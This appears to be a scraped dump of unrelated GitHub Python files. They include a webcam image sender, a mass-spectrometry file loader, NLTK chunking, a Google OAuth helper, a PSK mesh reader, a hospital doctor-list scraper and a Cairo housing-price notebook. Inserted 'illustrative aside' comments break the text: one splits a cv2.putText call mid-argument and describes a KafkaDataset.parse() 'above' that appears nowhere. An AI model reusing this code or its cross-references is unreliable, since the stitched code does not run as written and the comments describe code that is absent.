# grab the current timestamp and draw it on the frame\n timestamp = datetime.datetime.now()\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 
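# --- Illustrative aside (not part of the original source) -------------------
# KafkaDataset.parse() above reads self.feature_map, which is expected to
# group feature names (with dimensions) by dtype; a hypothetical example of
# that structure:
feature_map = {
    "FLOAT": {"price": 1},
    "INT": {"clicked": 1, "user_id": 1},   # FLAGS.label would name one of these
    "VARINT": {"item_history": 1},         # variable-length -> tf.io.VarLenFeature
}
# ---------------------------------------------------------------------------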
0, 255), 1)\n\n (success, encodedImage) = cv2.imencode(\".jpg\", frame)\n if not success:\n continue\n\n headers = {'content-type': 'image/jpeg'}\n try:\n requests.post(full_address, data=encodedImage.tostring(), headers=headers)\n except Exception as e:\n print(f\"Error occurred while trying to send image:\\n\\t{e}\\nExiting...\")\n exit()\n\n frames_sent += 1\n fps_tracker.frame_sent()\n\n fps_tracker.close_log()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Sends images to end point')\n parser.add_argument('-a', '--address', dest='address',\n help=\"Web address to send the images captured from the camera to\", required=True)\n parser.add_argument('-f', '--frames', dest='frames', default=-1, type=int,\n help='Amount of frames from the camera to send to the endpoint (default: infinite)')\n parser.add_argument('--fps', default=-1, type=int, dest='fps',\n help='FPS to capture images at (default: infinite)')\n parser.add_argument('-j', '--jetson', dest='jetson', action='store_true',\n help='Flag specifying if you are running this from an nvidia jetson')\n parser.add_argument('-c', '--crop', dest='crop', action='store_true',\n help='Flag specifying if you would like to perform face cropping before sending the image')\n parser.add_argument('-s', '--size', dest='size', nargs=2, type=int, default=[360, 240], metavar=('width', 'height'),\n help='Specify what size the image sent should be (default: 360 x 240)')\n parser.add_argument('-p', '--print', dest='print', type=int, default=-1,\n help='Print interval for the FPS tracker')\n parser.add_argument('-l', '--log', dest='log', default=None,\n help='File to log raw FPS data to')\n args = parser.parse_args()\n\n if args.jetson:\n video = cv2.VideoCapture(utils.jetson_gstreamer_pipeline(), cv2.CAP_GSTREAMER)\n else:\n video = cv2.VideoCapture(0)\n\n send_frames(video, args.address, size=tuple(args.size), fps=args.fps, frames_to_send=args.frames, crop=args.crop,\n print_interval=args.print, log=args.log)\n video.release()\n","repo_name":"John-Boccio/FacialExpressionRecognition","sub_path":"FlaskSend.py","file_name":"FlaskSend.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36756882201","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 29 2021\r\nPart 4: New MS2 Loading\r\n@author: Li Zimu\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nimport re\r\n\r\n\r\n\r\n# read feature files\r\ndef read_xlsx_file(file_name):\r\n# file_name=Characteristic_ions_file_name\r\n if '.csv' in file_name:\r\n df = pd.read_csv(file_name)\r\n# print('running--------')\r\n else:\r\n df = pd.read_excel(file_name)\r\n data=df.values.tolist()\r\n return data\r\n\r\ndef check(str):\r\n\r\n my_re = re.compile(r'[A-Za-z]')\r\n\r\n res = re.findall(my_re,str)\r\n if len(res):\r\n\r\n return False\r\n else:\r\n return True\r\n\r\n\r\n# Read '.mgf' file, transform to list\r\ndef seed_MS2toList_align(file_path,mgf_name):\r\n# mgf_name = seed_file_name\r\n MS2List=[]\r\n seed_name = [\"HCAAs\" ,\"CGFs\",\"BOAs\"]\r\n if any(e in mgf_name for e in seed_name):\r\n mark = \"seed_metabolite\"\r\n else:\r\n mark = 0\r\n with open(file_path+mgf_name)as f:\r\n for line in f:\r\n line=line.rstrip()\r\n if len(line) < 4:\r\n continue\r\n if line== \"BEGIN IONS\":\r\n oneMS2List=[0,0,0,0,0]\r\n id_list_1 = ''\r\n id_list_2 = ''\r\n spec=[]\r\n continue\r\n if line[:3]=='ID=':\r\n id_list_1=line[3:]\r\n continue\r\n if 
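# --- Illustrative aside (not part of the original source) -------------------
# send_frames() above POSTs raw JPEG bytes to
#   {addr}/cropped=<bool>&width=<w>&height=<h>
# A hypothetical minimal Flask receiver for that exact path shape; this
# endpoint is an assumption and is not part of the original repository.
from flask import Flask, request

app = Flask(__name__)

@app.route('/cropped=<cropped>&width=<int:width>&height=<int:height>', methods=['POST'])
def receive(cropped, width, height):
    jpg_bytes = request.get_data()  # body sent with content-type image/jpeg
    # e.g. decode with: cv2.imdecode(np.frombuffer(jpg_bytes, np.uint8), cv2.IMREAD_COLOR)
    return '', 204
# ---------------------------------------------------------------------------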
line[:9]=='Align_ID=':\r\n id_list_2=line[9:]\r\n continue\r\n if line[:5]=='NAME=':\r\n oneMS2List[2]=line[5:]\r\n continue\r\n # oneMS2List[0]=int(line[1])\r\n if line[:12] == \"RTINSECONDS=\":\r\n oneMS2List[3]=float(line[12:])\r\n continue\r\n if line[:8]=='PEPMASS=':\r\n line=re.split('=| ',line)\r\n oneMS2List[4]=float(line[1])\r\n continue\r\n\r\n if line==\"END IONS\":\r\n oneMS2List[0]=mgf_name\r\n oneMS2List[1]=mark\r\n oneMS2List.append(spec)\r\n oneMS2List.append(id_list_1)\r\n oneMS2List.append(id_list_2)\r\n MS2List.append(oneMS2List)\r\n continue\r\n\r\n # if line.find(\"=\") == -1:\r\n if check(line):\r\n mz_intensity=[]\r\n line=re.split('[ |\\t]+',line)\r\n mz_intensity.append(float(line[0]))\r\n mz_intensity.append(float(line[1]))\r\n spec.append(mz_intensity)\r\n continue\r\n\r\n return MS2List\r\n\r\n\r\n\r\n# Import all the new '.mgf' files\r\noutput_mgf_file_path = 'D:\\\\Python_code\\\\script_code\\\\new_mgf_file\\\\'\r\n\r\nmfg_all_name = os.listdir(output_mgf_file_path)\r\nMS2List = []\r\nfor name in mfg_all_name:\r\n\r\n MS2List+=seed_MS2toList_align(output_mgf_file_path,name)\r\nprint('Read new generated mgf files Finished')\r\n","repo_name":"DLUT-datas/KHMN","sub_path":"4 New MS2 Loading.py","file_name":"4 New MS2 Loading.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11215636172","text":"from django.test import TestCase\n\n# Create your tests here.\nclass TestCalls(APITestCase):\n\n def setUp(self):\n\n self.session = self.client.session\n self.request = self.client.post(\n reverse(\"input\", args=[\"list\"]), {\"word_list\": words}, format=\"json\"\n )\n self.request.session = {}","repo_name":"danielpassy/Linx-App","sub_path":"backend/weather/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1920212096","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 24 10:00:40 2021\n\n@author: rohan\n\"\"\"\n\nimport nltk #we'll use nltk.pos_tag() for pos tagging \n#for importing speeches\nfrom nltk.corpus import state_union\n#for custom tokenizing \nfrom nltk.tokenize import PunktSentenceTokenizer\n\n#importint train text\ntrain_text = state_union.raw(\"2005-GWBush.txt\")\n#target text for pos tag\nbush_speech = state_union.raw(\"2006-GWBush.txt\")\n\n\n#making custom tokenizer\ncustom_sent_tokenizer = PunktSentenceTokenizer(train_text)\n#tokens from custom tokenizer\nbush_speech_tokens = custom_sent_tokenizer.tokenize(bush_speech)\n\n\n\ndef process_content():\n try:\n for i in bush_speech_tokens:\n words = nltk.word_tokenize(i)\n tagged_pos = nltk.pos_tag(words)\n '''chunkGram = r\"\"\"Chunk: {*}\"\"\"\n chunkParser = nltk.RegexpParser(chunkGram)\n chunked = chunkParser.parse(tagged_pos)'''\n chunkGram = r\"\"\"Chunk: {<.*>+}\n }+{\"\"\"\n chunkParser = nltk.RegexpParser(chunkGram)\n chunked = chunkParser.parse(tagged_pos)\n print(chunked)\n chunked.draw()\n except Exception as e:\n print(str(e))\nprocess_content()\n","repo_name":"imrk97/MLTutorial","sub_path":"NLP_santdex/chunking.py","file_name":"chunking.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40810507755","text":"from google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.oauth2.credentials import Credentials\nfrom google.auth.transport.requests 
import Request\n\n\nclass AuthClient:\n def __init__(self, auth_api=None):\n self.api = auth_api()\n\n @classmethod\n def create(cls):\n return cls(GoogleAuthAPI)\n\n @classmethod\n def create_null(cls):\n return cls(AuthStub)\n\n def get_credentials(self):\n return self.api.get_credentials()\n\n\nclass GoogleAuthAPI:\n def run_browser_authentication(self):\n SCOPES = [\"https://www.googleapis.com/auth/gmail.send\"]\n flow = InstalledAppFlow.from_client_secrets_file(\"credentials.json\", SCOPES)\n return flow.run_local_server(port=0)\n\n def get_credentials(self):\n stored_creds = self.load_credentials(\"token.json\")\n\n if stored_creds and stored_creds.expired and stored_creds.refresh_token:\n print(\"Refreshing expired credentials...\")\n stored_creds.refresh(Request())\n self.store_credentials(stored_creds)\n return stored_creds\n elif stored_creds and not stored_creds.expired:  # guard against missing credentials\n print(\"Reusing stored credentials...\")\n return stored_creds\n else:\n print(\"No reusable credentials found; authenticating again...\")\n creds = self.run_browser_authentication()\n self.store_credentials(creds)\n return creds\n\n def store_credentials(self, creds):\n with open(\"token.json\", \"w\") as token:\n token.write(creds.to_json())\n\n def load_credentials(self, json):\n return Credentials.from_authorized_user_file(json)\n\n\nclass AuthStub:\n def get_credentials(self):\n creds = {\n \"token\": \"TOKEN\",\n \"refresh_token\": \"REFRESH TOKEN\",\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\n \"client_id\": \"CLIENTID\",\n \"client_secret\": \"CLIENTSECRET\",\n \"scopes\": [\"https://www.googleapis.com/auth/gmail.send\"],\n \"expiry\": \"EXPIRY\",\n }\n return creds\n","repo_name":"cadolphs/google_photo_emailer","sub_path":"photo_emailer/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31202317443","text":"import math\n\n\ndef MinDivisor(n):\n for i in range(2, math.ceil(math.sqrt(n)) + 1):\n if n % i == 0:\n return i\n return n\n\n\ndef IsPrime(n):\n if MinDivisor(n) == n:\n return True\n else:\n return False\n\n\nif __name__ == \"__main__\":\n n = int(input())\n if IsPrime(n):\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"samikhailov/coursera","sub_path":"python_osnovy_programmirovaniya/week_4/provierka-chisla-na-prostotu.py","file_name":"provierka-chisla-na-prostotu.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5358177356","text":"\"\"\"Database migration.\"\"\"\n\nimport sys\nimport os\nimport inspect\n\nimport DbMigrator\nfrom DbMigrator.driver import Driver\nfrom DbMigrator.defaultdatabasesource import DefaultDatabaseSource\nfrom DbMigrator.mysqldatabasehandler import MySqlDatabaseHandler\n\ndef build_driver():\n f = inspect.getfile(inspect.currentframe())\n this_dir = os.path.dirname(os.path.abspath(f))\n inifile = os.path.join(this_dir, 'conn.ini')\n if not os.path.exists(inifile):\n inifile = inifile + '.template'\n if not os.path.exists(inifile):\n raise Exception(\"Missing ini file at \" + inifile)\n schema_root_dir = os.path.normpath(os.path.join(this_dir, '..'))\n dds = DefaultDatabaseSource(inifile, schema_root_dir)\n driver = Driver(dds, MySqlDatabaseHandler())\n driver.default_database = \"schema\"\n driver.is_debug_printing = True\n return driver\n\ndef main():\n d = build_driver()\n d.main(sys.argv)\n\nif __name__ == 
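# --- Illustrative aside (not part of the original source) -------------------
# AuthClient above follows the "nullable infrastructure" pattern: production
# code wraps the real API, tests swap in the stub. A usage sketch:
real_client = AuthClient.create()        # wraps GoogleAuthAPI
test_client = AuthClient.create_null()   # wraps AuthStub, no network I/O
creds = test_client.get_credentials()    # plain dict with placeholder fields
# ---------------------------------------------------------------------------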
'__main__':\n main()\n","repo_name":"jzohrab/DbMigrator_Demo","sub_path":"tools/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14534566344","text":"import os\n\ndef GetAlteredInstructions(alterationIndex):\n jmpOrNopIndex = 0\n alteredInstrctions = []\n for instruction in instructions:\n instructionType = instruction[0]\n if instructionType == \"jmp\" or instructionType == \"nop\":\n if jmpOrNopIndex == alterationIndex:\n if instructionType == \"jmp\":\n instructionType = \"nop\"\n else:\n instructionType = \"jmp\"\n jmpOrNopIndex += 1\n\n alteredInstrctions.append([ instructionType, instruction[1], instruction[2] ])\n return alteredInstrctions\n\ndef CheckInstructions(instructionList):\n accumulator = 0\n instructionIndex = 0\n infinate = True\n done = False\n while not done:\n if instructionIndex >= len(instructionList):\n infinate = False\n done = True\n break\n instruction = instructionList[instructionIndex]\n if instruction[2] == 1:\n done = True\n break\n elif instruction[0] == \"jmp\":\n instructionIndex += instruction[1]\n elif instruction[0] == \"acc\":\n accumulator += instruction[1]\n instructionIndex += 1\n elif instruction[0] == \"nop\":\n instructionIndex += 1\n instruction[2] += 1\n return [infinate, accumulator]\n\nscript_dir = os.path.dirname(os.path.abspath(__file__))\ninstructions = []\n\nwith open(os.path.join(script_dir, \"input.txt\"), \"r\") as file:\n for line in file:\n instructionParts = line.strip('\\n').split(' ')\n instructions.append([ instructionParts[0], int(instructionParts[1]), 0 ])\n\nprint ('Processed ' + str(len(instructions)) + ' instructions')\n\nprint('Solution 1: accumulator is ' + str(CheckInstructions(GetAlteredInstructions(-1))[1]))\n\naccumulatorResult = 0\ninfinate = True\ntryIndex = 0\nwhile infinate and tryIndex < len(instructions):\n alteredInstructions = GetAlteredInstructions(tryIndex)\n tryIndex += 1\n result = CheckInstructions(alteredInstructions)\n if not result[0]:\n infinate = result[0]\n accumulatorResult = result[1]\n break \n\nprint('Solution 2: accumulator is ' + str(accumulatorResult))","repo_name":"jtmach/AdventOfCode2019","sub_path":"20201208/20201208.py","file_name":"20201208.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24257009031","text":"from .data import *\nimport ctypes\n\n\nclass PskReader(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def read_types(fp, data_class: ctypes.Structure, section: Section, data):\n buffer_length = section.data_size * section.data_count\n buffer = fp.read(buffer_length)\n offset = 0\n for _ in range(section.data_count):\n data.append(data_class.from_buffer_copy(buffer, offset))\n offset += section.data_size\n\n def read(self, path) -> Psk:\n psk = Psk()\n with open(path, 'rb') as fp:\n while fp.read(1):\n fp.seek(-1, 1)\n section = Section.from_buffer_copy(fp.read(ctypes.sizeof(Section)))\n if section.name == b'ACTRHEAD':\n pass\n elif section.name == b'PNTS0000':\n PskReader.read_types(fp, Vector3, section, psk.points)\n elif section.name == b'VTXW0000':\n if section.data_size == ctypes.sizeof(Psk.Wedge16):\n PskReader.read_types(fp, Psk.Wedge16, section, psk.wedges)\n elif section.data_size == ctypes.sizeof(Psk.Wedge32):\n PskReader.read_types(fp, Psk.Wedge32, section, psk.wedges)\n else:\n raise RuntimeError('Unrecognized wedge 
format')\n elif section.name == b'MATT0000':\n PskReader.read_types(fp, Psk.Material, section, psk.materials)\n elif section.name == b'REFSKELT':\n PskReader.read_types(fp, Psk.Bone, section, psk.bones)\n elif section.name == b'RAWWEIGHTS':\n PskReader.read_types(fp, Psk.Weight, section, psk.weights)\n elif section.name == b'FACE3200':\n PskReader.read_types(fp, Psk.Face32, section, psk.faces)\n elif section.name == b'VERTEXCOLOR':\n PskReader.read_types(fp, Color, section, psk.vertex_colors)\n elif section.name.startswith(b'EXTRAUVS'):\n PskReader.read_types(fp, Vector2, section, psk.extra_uvs)\n elif section.name == b'VTXNORMS':\n PskReader.read_types(fp, Vector3, section, psk.vertex_normals)\n else:\n raise RuntimeError(f'Unrecognized section \"{section.name}\" at position {fp.tell()}')\n return psk\n","repo_name":"SilverDash/io_scene_psk_psa","sub_path":"io_scene_psk_psa/psk/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"17654191561","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nauthor : Xiaojun Wang\r\ncreate date :\r\nmodified date: \r\nversion : \r\n#==============================================================================\r\n# \r\n#==============================================================================\r\n\"\"\"\r\n#%%% import modules\r\nfrom urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport time, codecs\r\n\r\n#%%% inputs and outputs\r\n#keshiDic = {}\r\n#for line in codecs.open('莆田市第一医院_简表.txt', encoding='utf-8'):\r\n# linelist = line.strip('\\n').strip('\\r').split('\\t')\r\n# keshiDic[linelist[2]] = 0\r\n#base = 'http://www.ptsyy.com/'\r\n#href = 'http://www.ptsyy.com/index.php/section.html'\r\n#html = urlopen(href)\r\n#bsObj = BeautifulSoup(html)\r\n#keshiLIST = bsObj.find('div', {'class':'right_main'}).findAll('td')\r\n#for ks in keshiLIST:\r\n# keshi = ks.get_text()[1:]\r\n# href = ks.find('a').attrs['href']\r\n# html = urlopen(href)\r\n# bsObj = BeautifulSoup(html)\r\n# kshref = bsObj.findAll('a',{'class':'more'})[2].attrs['href']\r\n# kshtml = urlopen(kshref)\r\n# bsObj = BeautifulSoup(kshtml)\r\n# try:\r\n# doctorLIST = bsObj.find('div',{'class':'r_doctor'}).findAll('div',{'class':'doctor'})\r\n# except:\r\n# continue\r\n# if len(doctorLIST)<1:continue\r\n# for doc in doctorLIST:\r\n# name = doc.find('a').find('img').attrs['alt']\r\n# href = doc.find('a').attrs['href']\r\n# string = '\\t'.join([name, keshi, href])\r\n# string = string.replace('\\u3000','').replace('\\r','').replace('\\n',' ')\r\n# string = string.replace('\\xa0','').replace(' ','')\r\n# outfile = codecs.open('莆田市第一医院_简表.txt', 'a', 'utf-8')\r\n# try:\r\n# outfile.write(string+'\\n') \r\n# except:\r\n# print(string.replace('\\t', '|'))\r\n# outfile.close()\r\n\r\n#%%\r\noutfile = open('莆田市第一医院_医生列表.txt', 'a')\r\noutfile.close()\r\ndoctorDic = {}\r\nfor line in codecs.open('莆田市第一医院_医生列表.txt', encoding='utf-8'):\r\n doctorDic[line.strip().split('\\t')[-1]]=0\r\n\r\nhref2doctor = {}\r\nfor line in codecs.open('莆田市第一医院_简表.txt', encoding='utf-8'):\r\n linelist = line.strip('\\n').strip('\\r').split('\\t')\r\n href2doctor[linelist[-1]] = '\\t'.join(linelist[0:-1])\r\n\r\nfor href in href2doctor:\r\n if href in doctorDic:\r\n continue\r\n try:\r\n html = urlopen(href)\r\n bsObj = BeautifulSoup(html)\r\n total = bsObj.find('div', 
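# --- Illustrative aside (not part of the original source) -------------------
# Reading a .psk file with the PskReader defined above; the file path is a
# made-up example.
reader = PskReader()
psk = reader.read('SkeletalMesh.psk')   # hypothetical file
print(len(psk.points), len(psk.wedges), len(psk.faces), len(psk.bones))
# ---------------------------------------------------------------------------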
{'style':'float:left;width:540px;'}).get_text().replace('\\n','').replace('\\t','')\r\n zhicheng = total.split('职称:')[1].split('简介:')[0]\r\n \r\n except:\r\n print(href)\r\n time.sleep(1)\r\n continue\r\n string = '\\t'.join([href2doctor[href], zhicheng, href])\r\n string = string.replace('\\u3000','').replace('\\r','').replace('\\n',' ')\r\n string = string.replace('\\xa0','').replace(' ',' ')\r\n outfile = codecs.open('莆田市第一医院_医生列表.txt', 'a','utf-8')\r\n try:\r\n outfile.write(string+'\\n')\r\n except:\r\n print(string.replace('\\t', '|'))\r\n outfile.close()\r\n time.sleep(1)\r\n","repo_name":"rockagain/PythonScript","sub_path":"extractDoctor莆田市第一医院.py","file_name":"extractDoctor莆田市第一医院.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20162503543","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# \"Open\n\n# In[518]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\n\n# In[519]:\n\n\nmy_file = Path(\"properties.csv\")\nif my_file.is_file()==False:\n get_ipython().system(\"wget 'https://raw.githubusercontent.com/Bahaakhalled/Egypt-Cairo-Housing/main/properties.csv'\")\n\n\n# In[520]:\n\n\nprop=pd.read_csv('properties.csv')\nprop.head()\n\n\n# In[521]:\n\n\nprop.info()\n\n\n# In[522]:\n\n\nprop.nunique()\n\n\n# In[523]:\n\n\nimport seaborn as sns\nimport string,re\n\n\n# In[524]:\n\n\ncprop=prop.copy()\n\n\n# In[525]:\n\n\ncprop.price.value_counts()\n\n\n# In[526]:\n\n\ntestingrows=cprop.loc[cprop.price=='Ask']\ncprop=cprop.drop(cprop.loc[cprop.price=='Ask'].index,axis=0)\ncprop\n\n\n# In[527]:\n\n\ncprop.title=cprop.title.apply(lambda m:m.lower())\ncprop.location=cprop.location.apply(lambda m:m.lower())\ncprop.type=cprop.type.apply(lambda m:m.lower())\n\ncprop.price=cprop.price.apply(lambda m:m.replace(',',''))\ncprop.price=cprop['price'].astype('int64')\n\n\n# In[528]:\n\n\ncprop=cprop.drop(cprop.sort_values(by='price',ascending=False).head(1).index,axis=0)\n\n\n# In[529]:\n\n\ncprop.bedroom.unique()\n\n\n# In[530]:\n\n\ncprop=cprop.drop(cprop.loc[cprop.bedroom=='{0}'].head(1).index,axis=0)\n\n\n# In[531]:\n\n\ncprop.bedroom=cprop.bedroom.apply(lambda m:m.replace('Studio','1'))\ncprop.type=cprop.type.apply(lambda m:m.replace('ivilla','villa'))\ncprop.type=cprop.type.apply(lambda m:m.replace('compound','apartment'))\ncprop.type=cprop.type.apply(lambda m:m.replace('hotel apartment','apartment'))\ncprop.bedroom=cprop['bedroom'].astype('int64')\ncprop.size_sqm=cprop.size_sqm.apply(lambda m:m.replace(',',''))\ncprop.size_sqm=cprop['size_sqm'].astype('int64')\npattern = r'[' + string.punctuation + ']'\ncprop['title']=cprop['title'].map(lambda m:re.sub(pattern,\" \",m))\ncprop['location']=cprop['location'].map(lambda m:re.sub(pattern,\" \",m))\n\n\n# In[532]:\n\n\nsns.set(rc={\"figure.figsize\":(25, 8)})\ncprop.hist()\n\n\n# In[533]:\n\n\ncityprop=cprop.copy()\ncityprop['City']='NA'\n\ncityprop.loc[cityprop['title'].str.contains(\"5th\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"settlement\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"new cairo\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"tag sultan\"),'City']='New Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"mivida\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"5th\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"settlement\"),'City']='New 
Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"new cairo\"),'City']='New Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"tag sultan\"),'City']='New Cairo'\n\n\ncityprop.loc[cityprop['title'].str.contains(\"new capital\"),'City']='New Capital'\ncityprop.loc[cityprop['location'].str.contains(\"new capital\"),'City']='New Capital'\ncityprop.loc[cityprop['title'].str.contains(\"capital\"),'City']='New Capital'\ncityprop.loc[cityprop['location'].str.contains(\"capital\"),'City']='New Capital'\n\ncityprop.loc[cityprop['title'].str.contains(\"mostakbal\"),'City']='Mostakbal City'\ncityprop.loc[cityprop['location'].str.contains(\"mostakbal\"),'City']='Mostakbal City'\n\ncityprop.loc[cityprop['title'].str.contains(\"shorouk\"),'City']='Shorouk'\ncityprop.loc[cityprop['title'].str.contains(\"madinaty\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"shorouk\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"madinaty\"),'City']='Shorouk'\ncityprop.loc[cityprop['title'].str.contains(\"eastown\"),'City']='Shorouk'\ncityprop.loc[cityprop['location'].str.contains(\"eastown\"),'City']='Shorouk'\n\n\ncityprop.loc[cityprop['title'].str.contains(\"heliopolis\"),'City']='New Heliopolis'\ncityprop.loc[cityprop['location'].str.contains(\"heliopolis\"),'City']='New Heliopolis'\n\n\ncityprop.loc[cityprop['location'].str.contains(\"uptown\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"zamalek\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"zamalek\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"mokattam\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"mokattam\"),'City']='Cairo'\ncityprop.loc[cityprop['title'].str.contains(\"maadi\"),'City']='Cairo'\ncityprop.loc[cityprop['location'].str.contains(\"maadi\"),'City']='Cairo'\ncityprop.loc[(cityprop['location'].str.contains(\"nasr\")) | (cityprop['title'].str.contains(\"nasr\")),'City']='Cairo'\ncityprop.loc[cityprop.City=='NA','City']='Cairo'\n\n\n# In[534]:\n\n\ncityprop.City.value_counts()\n\n\n# In[535]:\n\n\npd.set_option('display.max_colwidth', None)\ncityprop.loc[(cityprop['location'].str.contains(\"nasr city\")) & (cityprop.City=='NA')].head(50)\n\n\n# In[536]:\n\n\ncityprop.loc[(cityprop['title'].str.contains(\"apartment\")) & (cityprop.type!='apartment'),'type']='apartment'\ncityprop.loc[(cityprop['title'].str.contains(\"villa\")) & (cityprop.type!='villa'),'type']='villa'\ncityprop.loc[(cityprop['title'].str.contains(\"town\")) & (cityprop.type!='townhouse'),'type']='townhouse'\ncityprop.loc[(cityprop['title'].str.contains(\"twin\")) & (cityprop.type!='twin house'),'type']='twin house'\ncityprop.loc[(cityprop['title'].str.contains(\"duplex\")) & (cityprop.type!='duplex'),'type']='duplex'\ncityprop.loc[(cityprop['title'].str.contains(\"pent\")) & (cityprop.type!='penthouse'),'type']='penthouse'\ncityprop.loc[(cityprop['title'].str.contains(\"villa\")) & (cityprop.type!='villa'),'type']='villa'\ncityprop.loc[(cityprop['title'].str.contains(\"hotel\")) & (cityprop.type!='apartment'),'type']='apartment'\n\n\n# In[537]:\n\n\ncityprop.type.value_counts()\n\n\n# In[538]:\n\n\n#cityprop.loc[(cityprop['title'].str.contains(\"chalet\")) & (cityprop.type!='chalet')]\ncityprop=cityprop.drop(cityprop.loc[cityprop.type=='chalet'].index,axis=0)\n\n\n# In[539]:\n\n\ncityprop.type.value_counts()\n\n\n# In[540]:\n\n\nprop_with_ol=cityprop.copy()\n\n\n# In[541]:\n\n\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as 
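# --- Illustrative aside (not part of the original source) -------------------
# The long chain of .str.contains() assignments above can be collapsed into a
# keyword -> city table; a sketch using keywords taken from those cells
# (later entries intentionally overwrite earlier ones, as in the original):
city_keywords = {
    'New Cairo': ['5th', 'settlement', 'new cairo', 'tag sultan', 'mivida'],
    'New Capital': ['capital'],          # also covers 'new capital'
    'Mostakbal City': ['mostakbal'],
    'Shorouk': ['shorouk', 'madinaty', 'eastown'],
    'New Heliopolis': ['heliopolis'],
}
for city, words in city_keywords.items():
    for w in words:
        mask = (cityprop['title'].str.contains(w)
                | cityprop['location'].str.contains(w))
        cityprop.loc[mask, 'City'] = city
# ---------------------------------------------------------------------------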
plt\n\nplot , ax = plt.subplots(1 , 2 , figsize = (25 , 7))\n\noutliers = (preprocessing.scale(cityprop[\"size_sqm\"]) >3)\nsns.scatterplot(data=cityprop,x=preprocessing.scale(cityprop['size_sqm']),y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = preprocessing.scale(cityprop['size_sqm']), y = preprocessing.scale(cityprop['price']),ax=ax[1])\n\n\n# In[542]:\n\n\nsns.set(rc={\"figure.figsize\":(25, 8)})\n\nplot , ax = plt.subplots(1 , 2 , figsize = (25 , 7))\noutliers = (((cityprop[\"bathroom\"]==3) | (cityprop[\"bathroom\"]==4)) & (preprocessing.scale(cityprop[\"price\"])>8))\nsns.scatterplot(data=cityprop,x=cityprop['bathroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bathroom'], y = preprocessing.scale(cityprop['price']),ax=ax[1])\n\n\n# In[543]:\n\n\noutliers = ((cityprop[\"bedroom\"]==6) & (preprocessing.scale(cityprop[\"price\"])>9))\n\nplot , ax = plt.subplots(2 , 2 , figsize = (25 , 7))\n\nsns.scatterplot(data=cityprop,x=cityprop['bedroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers],ax=ax[0,0])\n\ncityprop.drop(cityprop[outliers].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bedroom'], y = preprocessing.scale(cityprop['price']),ax=ax[0,1])\n\noutliers1 = ((cityprop[\"bedroom\"]==2) & (preprocessing.scale(cityprop[\"price\"])>2))\nsns.scatterplot(data=cityprop,x=cityprop['bedroom'],y=preprocessing.scale(cityprop['price']),c = [\"red\" if is_outlier else \"blue\" for is_outlier in outliers1],ax=ax[1,0])\n\ncityprop.drop(cityprop[outliers1].index , inplace = True)\nsns.scatterplot(data = cityprop ,x = cityprop['bedroom'], y = 